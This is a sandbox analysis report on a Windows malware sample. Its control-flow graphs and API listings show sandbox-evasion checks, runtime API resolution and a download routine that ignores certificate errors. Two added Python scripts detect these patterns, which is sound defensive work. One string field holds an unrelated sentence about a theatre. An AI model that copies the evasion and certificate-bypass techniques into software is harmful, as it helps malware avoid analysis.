                                  control_flow_graph 2141 2d1bf0-2d1c0b call 2b2a90 call 2d6390 2146 2d1c0d 2141->2146 2147 2d1c1a-2d1c27 call 2b2930 2141->2147 2148 2d1c10-2d1c18 2146->2148 2151 2d1c29-2d1c2f lstrcpy 2147->2151 2152 2d1c35-2d1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 2d1c6d-2d1c7b GetSystemInfo 2152->2156 2157 2d1c65-2d1c67 ExitProcess 2152->2157 2158 2d1c7d-2d1c7f ExitProcess 2156->2158 2159 2d1c85-2d1ca0 call 2b1030 call 2b10c0 GetUserDefaultLangID 2156->2159 2164 2d1cb8-2d1cca call 2d2ad0 call 2d3e10 2159->2164 2165 2d1ca2-2d1ca9 2159->2165 2171 2d1ccc-2d1cde call 2d2a40 call 2d3e10 2164->2171 2172 2d1ce7-2d1d06 lstrlen call 2b2930 2164->2172 2165->2164 2166 2d1cb0-2d1cb2 ExitProcess 2165->2166 2171->2172 2184 2d1ce0-2d1ce1 ExitProcess 2171->2184 2178 2d1d08-2d1d0d 2172->2178 2179 2d1d23-2d1d40 lstrlen call 2b2930 2172->2179 2178->2179 2181 2d1d0f-2d1d11 2178->2181 2186 2d1d5a-2d1d7b call 2d2ad0 lstrlen call 2b2930 2179->2186 2187 2d1d42-2d1d44 2179->2187 2181->2179 2185 2d1d13-2d1d1d lstrcpy lstrcat 2181->2185 2185->2179 2193 2d1d7d-2d1d7f 2186->2193 2194 2d1d9a-2d1db4 lstrlen call 2b2930 2186->2194 2187->2186 2188 2d1d46-2d1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 2d1d81-2d1d85 2193->2195 2199 2d1dce-2d1deb call 2d2a40 lstrlen call 2b2930 2194->2199 2200 2d1db6-2d1db8 2194->2200 2195->2194 2197 2d1d87-2d1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 2d1ded-2d1def 2199->2206 2207 2d1e0a-2d1e0f 2199->2207 2200->2199 2202 2d1dba-2d1dc8 lstrcpy lstrcat 2200->2202 2202->2199 2206->2207 2208 2d1df1-2d1df5 2206->2208 2209 2d1e16-2d1e22 call 2b2930 2207->2209 2210 2d1e11 call 2b2a20 2207->2210 2208->2207 2211 2d1df7-2d1e04 lstrcpy lstrcat 2208->2211 2215 2d1e24-2d1e26 2209->2215 2216 2d1e30-2d1e66 call 2b2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2218 2d1e28-2d1e2a lstrcpy 2215->2218 2228 2d1e8c-2d1ea0 CreateEventA call 2d1b20 call 2cffd0 2216->2228 2229 2d1e68-2d1e8a CloseHandle Sleep OpenEventA 
2216->2229 2218->2216 2233 2d1ea5-2d1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                  APIs
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 002D63E9
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C24A0), ref: 002D6402
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C2488), ref: 002D641A
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C2380), ref: 002D6432
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C90B8), ref: 002D644B
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011B56B0), ref: 002D6463
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011B5830), ref: 002D647B
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C22A8), ref: 002D6494
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C23C8), ref: 002D64AC
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C23E0), ref: 002D64C4
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 002D64DD
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 002D64F5
                                    • Part of subcall function 002D6390: GetProcAddress.KERNEL32(74DD0000,011C24E8), ref: 002D650D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D1C2F
                                  • ExitProcess.KERNEL32 ref: 002D1C67
                                  • GetSystemInfo.KERNEL32(?), ref: 002D1C71
                                  • ExitProcess.KERNEL32 ref: 002D1C7F
                                    • Part of subcall function 002B1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002B1046
                                    • Part of subcall function 002B1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 002B104D
                                    • Part of subcall function 002B1030: ExitProcess.KERNEL32 ref: 002B1058
                                    • Part of subcall function 002B10C0: GlobalMemoryStatusEx.KERNEL32 ref: 002B10EA
                                    • Part of subcall function 002B10C0: ExitProcess.KERNEL32 ref: 002B1114
                                  • GetUserDefaultLangID.KERNEL32 ref: 002D1C8F
                                  • ExitProcess.KERNEL32 ref: 002D1CB2
                                  • ExitProcess.KERNEL32 ref: 002D1CE1
                                  • lstrlen.KERNEL32(011C9038), ref: 002D1CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1D15
                                  • lstrcat.KERNEL32(00000000,011C9038), ref: 002D1D1D
                                  • lstrlen.KERNEL32(002E4B98), ref: 002D1D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1D48
                                  • lstrcat.KERNEL32(00000000,002E4B98), ref: 002D1D54
                                  • lstrlen.KERNEL32(00000000), ref: 002D1D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1D94
                                  • lstrlen.KERNEL32(002E4B98), ref: 002D1D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1DBC
                                  • lstrcat.KERNEL32(00000000,002E4B98), ref: 002D1DC8
                                  • lstrlen.KERNEL32(00000000), ref: 002D1DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002D1E04
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: 81538a9702acb7c260cb51d73cf7ffeb697af8793a740be51e452e51f5b5af47
                                  • Instruction ID: 57c23d4080afe98c8808e7649af0cf056d8f89fc38742fb279308cbe041b71c2
                                  • Opcode Fuzzy Hash: 81538a9702acb7c260cb51d73cf7ffeb697af8793a740be51e452e51f5b5af47
                                  • Instruction Fuzzy Hash: 7971B331520356EBDB20AFB0DC89B6E777AAF44741F14403AF94A9B292DF309C25CB64
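The graph above gates environment probes with ExitProcess: the GetSystemInfo block (2d1c6d) has a direct edge to an ExitProcess block, the GetUserDefaultLangID block (2d1c85) reaches one two edges later, and VirtualAllocExNuma and GlobalMemoryStatusEx exit from inside the subcalls 002B1030 and 002B10C0. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the control_flow_graph text export into nodes and edges and lists every probe API from which an ExitProcess block is reachable within a small number of edges. The probe API set and the two-edge window are analyst assumptions; the input is a constructed excerpt of the 002D1BF0 graph printed above, so calls that exit inside subcalls are not seen (they appear only as "call 2b1030" / "call 2b10c0").

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Added example (not part of the Joe Sandbox report): parse the
# "control_flow_graph ..." text export and find environment probes whose
# basic block can reach an ExitProcess block within a few edges.
# Which APIs count as probes is an analyst's assumption, not a report field.
PROBE_APIS = frozenset({
    "GetSystemInfo", "GlobalMemoryStatusEx", "GetUserDefaultLangID",
    "GetUserDefaultLocaleName", "VirtualAllocExNuma",
})

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{4,8}(?:-[0-9a-f]{4,8})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Node:
    nid: int
    addr: str                                   # "start-end" or a single address
    apis: list = field(default_factory=list)    # Win32 APIs called in the block
    calls: list = field(default_factory=list)   # internal subcall addresses


@dataclass
class Cfg:
    nodes: dict = field(default_factory=dict)   # nid -> Node, in export order
    edges: list = field(default_factory=list)   # (src nid, dst nid)


def parse_cfg(text: str) -> Cfg:
    """Node ids are decimal and always followed by a hex address (range);
    'a->b' is an edge, 'call <addr>' a subcall, '* n' repeats the last item."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, last = Cfg(), None, None
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t == "*" and last:
            last.extend([last[-1]] * (int(toks[i + 1]) - 1))  # item already added once
            i += 2
        elif NODE_ID.match(t) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = Node(int(t), toks[i + 1])
            cfg.nodes[cur.nid] = cur
            last = None
            i += 2
        elif t == "call" and cur is not None:
            cur.calls.append(toks[i + 1])
            last = cur.calls
            i += 2
        else:
            if cur is not None:
                cur.apis.append(t)
                last = cur.apis
            i += 1
    return cfg


def exit_gated_probes(cfg: Cfg, probes=PROBE_APIS, max_hops: int = 2):
    """Return (probe api, probe node, ExitProcess node, hops) for every probe
    whose block reaches a block calling ExitProcess within max_hops edges."""
    succ = defaultdict(set)
    for a, b in cfg.edges:
        succ[a].add(b)
    hits = []
    for nid, node in cfg.nodes.items():
        for api in sorted(set(node.apis) & probes):
            frontier, seen = {nid}, {nid}
            for hop in range(1, max_hops + 1):
                nxt = set().union(*(succ[n] for n in frontier)) - seen
                for n in sorted(nxt):
                    target = cfg.nodes.get(n)        # excerpt may lack some targets
                    if target and "ExitProcess" in target.apis:
                        hits.append((api, nid, n, hop))
                seen |= nxt
                frontier = nxt
    return hits


# Constructed sample: the first part of the 002D1BF0 graph from the report.
CFG_2D1BF0 = (
    "control_flow_graph 2141 2d1bf0-2d1c0b call 2b2a90 call 2d6390 2146 2d1c0d "
    "2141->2146 2147 2d1c1a-2d1c27 call 2b2930 2141->2147 2148 2d1c10-2d1c18 "
    "2146->2148 2151 2d1c29-2d1c2f lstrcpy 2147->2151 2152 2d1c35-2d1c63 "
    "2147->2152 2148->2147 2148->2148 2151->2152 2156 2d1c6d-2d1c7b GetSystemInfo "
    "2152->2156 2157 2d1c65-2d1c67 ExitProcess 2152->2157 2158 2d1c7d-2d1c7f "
    "ExitProcess 2156->2158 2159 2d1c85-2d1ca0 call 2b1030 call 2b10c0 "
    "GetUserDefaultLangID 2156->2159 2164 2d1cb8-2d1cca call 2d2ad0 call 2d3e10 "
    "2159->2164 2165 2d1ca2-2d1ca9 2159->2165 2171 2d1ccc-2d1cde call 2d2a40 "
    "call 2d3e10 2164->2171 2172 2d1ce7-2d1d06 lstrlen call 2b2930 2164->2172 "
    "2165->2164 2166 2d1cb0-2d1cb2 ExitProcess 2165->2166 2171->2172 "
    "2184 2d1ce0-2d1ce1 ExitProcess 2171->2184"
)

if __name__ == "__main__":
    g = parse_cfg(CFG_2D1BF0)
    for api, src, dst, hops in exit_gated_probes(g):
        print(f"{api} in block {src} ({g.nodes[src].addr}) reaches ExitProcess "
              f"in block {dst} ({g.nodes[dst].addr}) after {hops} edge(s)")
```

On the excerpt this reports GetSystemInfo (block 2156) one edge from ExitProcess and GetUserDefaultLangID (block 2159) two edges from it. Raising max_hops trades precision for recall; probes that exit inside a subcall need the subcall's own graph parsed the same way.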

                                  Control-flow Graph (text export of the graph view: each node is "id start-end" followed by the APIs the block calls, "call addr" for an internal subcall and "* n" for a call repeated n times; "a->b" is an edge; the executed / not executed colouring of the graph view is not preserved in this export)
                                  control_flow_graph 2234 2b6c40-2b6c64 call 2b2930 2237 2b6c66-2b6c6b 2234->2237 2238 2b6c75-2b6c97 call 2b4bc0 2234->2238 2237->2238 2239 2b6c6d-2b6c6f lstrcpy 2237->2239 2242 2b6caa-2b6cba call 2b2930 2238->2242 2243 2b6c99 2238->2243 2239->2238 2247 2b6cc8-2b6cf5 InternetOpenA StrCmpCA 2242->2247 2248 2b6cbc-2b6cc2 lstrcpy 2242->2248 2244 2b6ca0-2b6ca8 2243->2244 2244->2242 2244->2244 2249 2b6cfa-2b6cfc 2247->2249 2250 2b6cf7 2247->2250 2248->2247 2251 2b6ea8-2b6ebb call 2b2930 2249->2251 2252 2b6d02-2b6d22 InternetConnectA 2249->2252 2250->2249 2261 2b6ec9-2b6ee0 call 2b2a20 * 2 2251->2261 2262 2b6ebd-2b6ebf 2251->2262 2253 2b6d28-2b6d5d HttpOpenRequestA 2252->2253 2254 2b6ea1-2b6ea2 InternetCloseHandle 2252->2254 2256 2b6d63-2b6d65 2253->2256 2257 2b6e94-2b6e9e InternetCloseHandle 2253->2257 2254->2251 2259 2b6d7d-2b6dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 2b6d67-2b6d77 InternetSetOptionA 2256->2260 2257->2254 2263 2b6daf-2b6dd3 call 2d71e0 call 2b2a20 * 2 2259->2263 2264 2b6dd4-2b6de4 call 2d3d90 2259->2264 2260->2259 2262->2261 2265 2b6ec1-2b6ec3 lstrcpy 2262->2265 2264->2263 2275 2b6de6-2b6de8 2264->2275 2265->2261 2276 2b6dee-2b6e07 InternetReadFile 2275->2276 2277 2b6e8d-2b6e8e InternetCloseHandle 2275->2277 2276->2277 2279 2b6e0d 2276->2279 2277->2257 2281 2b6e10-2b6e15 2279->2281 2281->2277 2283 2b6e17-2b6e3d call 2d7310 2281->2283 2286 2b6e3f call 2b2a20 2283->2286 2287 2b6e44-2b6e51 call 2b2930 2283->2287 2286->2287 2291 2b6e53-2b6e57 2287->2291 2292 2b6e61-2b6e8b call 2b2a20 InternetReadFile 2287->2292 2291->2292 2293 2b6e59-2b6e5b lstrcpy 2291->2293 2292->2277 2292->2281 2293->2292
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B6C6F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6CC2
                                  • InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B6CD5
                                  • StrCmpCA.SHLWAPI(?,011CE9C8), ref: 002B6CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002B6D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011CE2E0,00000000,00000000,-00400100,00000000), ref: 002B6D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002B6D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002B6D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002B6DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002B6DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B6E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 002B6E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 002B6E8E
                                  • InternetCloseHandle.WININET(?), ref: 002B6E98
                                  • InternetCloseHandle.WININET(00000000), ref: 002B6EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B6EC3
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: bb663c56b8f3978c4043f21138edccd0508d31c5506bd59735667e80348d0562
                                  • Instruction ID: 11fbd7d450b164347530134792a9cb02c904477346171d2751e2f2cc0e978bf1
                                  • Opcode Fuzzy Hash: bb663c56b8f3978c4043f21138edccd0508d31c5506bd59735667e80348d0562
                                  • Instruction Fuzzy Hash: E681C571A21316ABEB10DFA4DC89FEE77B8EF04740F104069F909EB281DB74AD148B94
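The API list above is a plain WinINet GET: InternetOpenA, InternetConnectA, HttpOpenRequestA with the verb GET, InternetSetOptionA with dwOption 0x1F (INTERNET_OPTION_SECURITY_FLAGS in wininet.h), HttpSendRequestA, HttpQueryInfoA, then InternetReadFile in a loop. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses API lines in this report format into records and matches that ordered sequence against them, decoding the security-flag bits it knows. Assumptions: the third InternetSetOptionA argument is read as the DWORD value the report prints (the real parameter is a pointer to that DWORD), only the SECURITY_FLAG_IGNORE_* constants listed in the code are decoded and any other bits are reported raw, and the input is a constructed copy of the 002B6C40 API list.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Added example (not part of the Joe Sandbox report): parse "APIs" lines of a
# function summary and match an ordered WinINet download sequence against them.

# Constructed sample: the API list of function 002B6C40 as printed in the report.
APIS_2B6C40 = """\
lstrcpy.KERNEL32(00000000,?), ref: 002B6C6F
lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6CC2
InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B6CD5
StrCmpCA.SHLWAPI(?,011CE9C8), ref: 002B6CED
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002B6D15
HttpOpenRequestA.WININET(00000000,GET,?,011CE2E0,00000000,00000000,-00400100,00000000), ref: 002B6D50
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002B6D77
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002B6D86
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002B6DA5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002B6DFF
lstrcpy.KERNEL32(00000000,?), ref: 002B6E5B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 002B6E7D
InternetCloseHandle.WININET(00000000), ref: 002B6E8E
InternetCloseHandle.WININET(?), ref: 002B6E98
InternetCloseHandle.WININET(00000000), ref: 002B6EA2
lstrcpy.KERNEL32(00000000,00000000), ref: 002B6EC3
"""

# "• Part of subcall function X: Api.MODULE(args), ref: ADDR" and the
# argument-less form "ExitProcess.KERNEL32 ref: ADDR" are both accepted.
LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: list                    # raw argument strings as printed
    ref: int                      # address of the call site
    subcall: Optional[str] = None  # set when the call lives in a subcall


def parse_api_lines(text: str):
    calls = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            args = m.group(4).split(",") if m.group(4) else []
            calls.append(Call(m.group(2), m.group(3), args, int(m.group(5), 16), m.group(1)))
    return calls


def arg_int(s: str):
    """Printed argument -> int; '?' (unknown) and string literals give None."""
    s = s.strip()
    neg = s.startswith("-")
    body = s[1:] if neg else s
    if not re.fullmatch(r"[0-9A-Fa-f]+", body):
        return None
    return -int(body, 16) if neg else int(body, 16)


INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_NAMES = {  # wininet.h; only the certificate-check bypass bits
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


def decode_security_flags(value: int):
    names = [n for bit, n in sorted(SECURITY_FLAG_NAMES.items()) if value & bit]
    return names, value & ~sum(SECURITY_FLAG_NAMES)   # (decoded, leftover bits)


# Ordered pattern with per-call predicates; gaps between matches are allowed.
WININET_GET_SEQUENCE = [
    ("InternetOpenA", lambda c: True),
    ("InternetConnectA", lambda c: True),
    ("HttpOpenRequestA", lambda c: len(c.args) > 1 and c.args[1] == "GET"),
    ("InternetSetOptionA", lambda c: arg_int(c.args[1]) == INTERNET_OPTION_SECURITY_FLAGS),
    ("HttpSendRequestA", lambda c: True),
    ("InternetReadFile", lambda c: True),
]


def match_sequence(calls, pattern):
    """Greedy in-order subsequence match; returns the matched calls or None."""
    matched, i = [], 0
    for api, pred in pattern:
        while i < len(calls) and not (calls[i].api == api and pred(calls[i])):
            i += 1
        if i == len(calls):
            return None
        matched.append(calls[i])
        i += 1
    return matched


def triage(text: str):
    seq = match_sequence(parse_api_lines(text), WININET_GET_SEQUENCE)
    if seq is None:
        return None
    names, rest = decode_security_flags(arg_int(seq[3].args[2]))
    return {"refs": [c.ref for c in seq], "security_flags": names, "undecoded_bits": rest}


if __name__ == "__main__":
    print(triage(APIS_2B6C40))
```

For the list above the match lands on the six call sites 002B6CD5, 002B6D15, 002B6D50, 002B6D77, 002B6D86 and 002B6DFF, and the 0x10300 written through INTERNET_OPTION_SECURITY_FLAGS decodes to IGNORE_UNKNOWN_CA and IGNORE_WRONG_USAGE with 0x10000 left undecoded. The same parser accepts the "Part of subcall function" lines, so a sequence can also be matched across a function and its callees.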

                                  Control-flow Graph (text export of the graph view: each node is "id start-end" followed by the APIs the block calls, "call addr" for an internal subcall and "* n" for a call repeated n times; "a->b" is an edge; the executed / not executed colouring of the graph view is not preserved in this export)
                                  control_flow_graph 2850 2b4a60-2b4afc RtlAllocateHeap 2867 2b4b7a-2b4bbe VirtualProtect 2850->2867 2868 2b4afe-2b4b03 2850->2868 2869 2b4b06-2b4b78 2868->2869 2869->2867
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B4AA3
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 002B4BB0
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: ef960fe798a3b006da220a208ca458ccc45d675f568ff7628e4f4d263ffc198b
                                  • Instruction ID: 93c07da1791484087da83532bc74fc9cd821cd52ee96cd526358bbbeb98d6011
                                  • Opcode Fuzzy Hash: ef960fe798a3b006da220a208ca458ccc45d675f568ff7628e4f4d263ffc198b
                                  • Instruction Fuzzy Hash: A6310B18FE029C768620FBEF4D47F5F6ED5DF87760B824056750877182C9A95520CAE2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 002D2A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 002D2A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 3677e5ad00bf07cd781cab4c0a6830dddb13ce331ab693f1d3e5d8d02e4602ea
                                  • Instruction ID: 3bc6ac3113041f49c51a80ef662c327b95b57dcba402f4eda9288a7493d25329
                                  • Opcode Fuzzy Hash: 3677e5ad00bf07cd781cab4c0a6830dddb13ce331ab693f1d3e5d8d02e4602ea
                                  • Instruction Fuzzy Hash: 0BF0B4B1A40244ABC710DF88DD49F9EBBBCF705B21F000226F915E33C0D774190486A1

                                  Control-flow Graph (rendered graph omitted; basic-block ranges, API calls per block and edges, with executed and not-executed blocks no longer distinguishable):

                                  633 2d66e0-2d66e7 634 2d66ed-2d6af9 GetProcAddress * 43 633->634 635 2d6afe-2d6b92 LoadLibraryA * 8 633->635 634->635 636 2d6c08-2d6c0f 635->636 637 2d6b94-2d6c03 GetProcAddress * 5 635->637 638 2d6c15-2d6ccd GetProcAddress * 8 636->638 639 2d6cd2-2d6cd9 636->639 637->636 638->639 640 2d6d4f-2d6d56 639->640 641 2d6cdb-2d6d4a GetProcAddress * 5 639->641 642 2d6d5c-2d6de4 GetProcAddress * 6 640->642 643 2d6de9-2d6df0 640->643 641->640 642->643 644 2d6df6-2d6f0b GetProcAddress * 12 643->644 645 2d6f10-2d6f17 643->645 644->645 646 2d6f8d-2d6f94 645->646 647 2d6f19-2d6f88 GetProcAddress * 5 645->647 648 2d6f96-2d6fbc GetProcAddress * 2 646->648 649 2d6fc1-2d6fc8 646->649 647->646 648->649 650 2d6fca-2d6ff0 GetProcAddress * 2 649->650 651 2d6ff5-2d6ffc 649->651 650->651 652 2d70ed-2d70f4 651->652 653 2d7002-2d70e8 GetProcAddress * 10 651->653 654 2d70f6-2d714d GetProcAddress * 4 652->654 655 2d7152-2d7159 652->655 653->652 654->655 656 2d716e-2d7175 655->656 657 2d715b-2d7169 GetProcAddress 655->657 658 2d7177-2d71ce GetProcAddress * 4 656->658 659 2d71d3 656->659 657->656 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011B58F0), ref: 002D66F5
                                  • GetProcAddress.KERNEL32(74DD0000,011B59D0), ref: 002D670D
                                  • GetProcAddress.KERNEL32(74DD0000,011C9628), ref: 002D6726
                                  • GetProcAddress.KERNEL32(74DD0000,011C9670), ref: 002D673E
                                  • GetProcAddress.KERNEL32(74DD0000,011C96D0), ref: 002D6756
                                  • GetProcAddress.KERNEL32(74DD0000,011C9610), ref: 002D676F
                                  • GetProcAddress.KERNEL32(74DD0000,011BB798), ref: 002D6787
                                  • GetProcAddress.KERNEL32(74DD0000,011CD028), ref: 002D679F
                                  • GetProcAddress.KERNEL32(74DD0000,011CD100), ref: 002D67B8
                                  • GetProcAddress.KERNEL32(74DD0000,011CD178), ref: 002D67D0
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFB0), ref: 002D67E8
                                  • GetProcAddress.KERNEL32(74DD0000,011B57F0), ref: 002D6801
                                  • GetProcAddress.KERNEL32(74DD0000,011B5910), ref: 002D6819
                                  • GetProcAddress.KERNEL32(74DD0000,011B5930), ref: 002D6831
                                  • GetProcAddress.KERNEL32(74DD0000,011B5810), ref: 002D684A
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0A0), ref: 002D6862
                                  • GetProcAddress.KERNEL32(74DD0000,011CD088), ref: 002D687A
                                  • GetProcAddress.KERNEL32(74DD0000,011BB9F0), ref: 002D6893
                                  • GetProcAddress.KERNEL32(74DD0000,011B5A30), ref: 002D68AB
                                  • GetProcAddress.KERNEL32(74DD0000,011CD040), ref: 002D68C3
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF50), ref: 002D68DC
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF68), ref: 002D68F4
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0E8), ref: 002D690C
                                  • GetProcAddress.KERNEL32(74DD0000,011B5890), ref: 002D6925
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF08), ref: 002D693D
                                  • GetProcAddress.KERNEL32(74DD0000,011CD118), ref: 002D6955
                                  • GetProcAddress.KERNEL32(74DD0000,011CD0B8), ref: 002D696E
                                  • GetProcAddress.KERNEL32(74DD0000,011CD130), ref: 002D6986
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF38), ref: 002D699E
                                  • GetProcAddress.KERNEL32(74DD0000,011CD190), ref: 002D69B7
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF80), ref: 002D69CF
                                  • GetProcAddress.KERNEL32(74DD0000,011CD058), ref: 002D69E7
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFC8), ref: 002D6A00
                                  • GetProcAddress.KERNEL32(74DD0000,011CA650), ref: 002D6A18
                                  • GetProcAddress.KERNEL32(74DD0000,011CD1A8), ref: 002D6A30
                                  • GetProcAddress.KERNEL32(74DD0000,011CCF98), ref: 002D6A49
                                  • GetProcAddress.KERNEL32(74DD0000,011B58B0), ref: 002D6A61
                                  • GetProcAddress.KERNEL32(74DD0000,011CCFE0), ref: 002D6A79
                                  • GetProcAddress.KERNEL32(74DD0000,011B5950), ref: 002D6A92
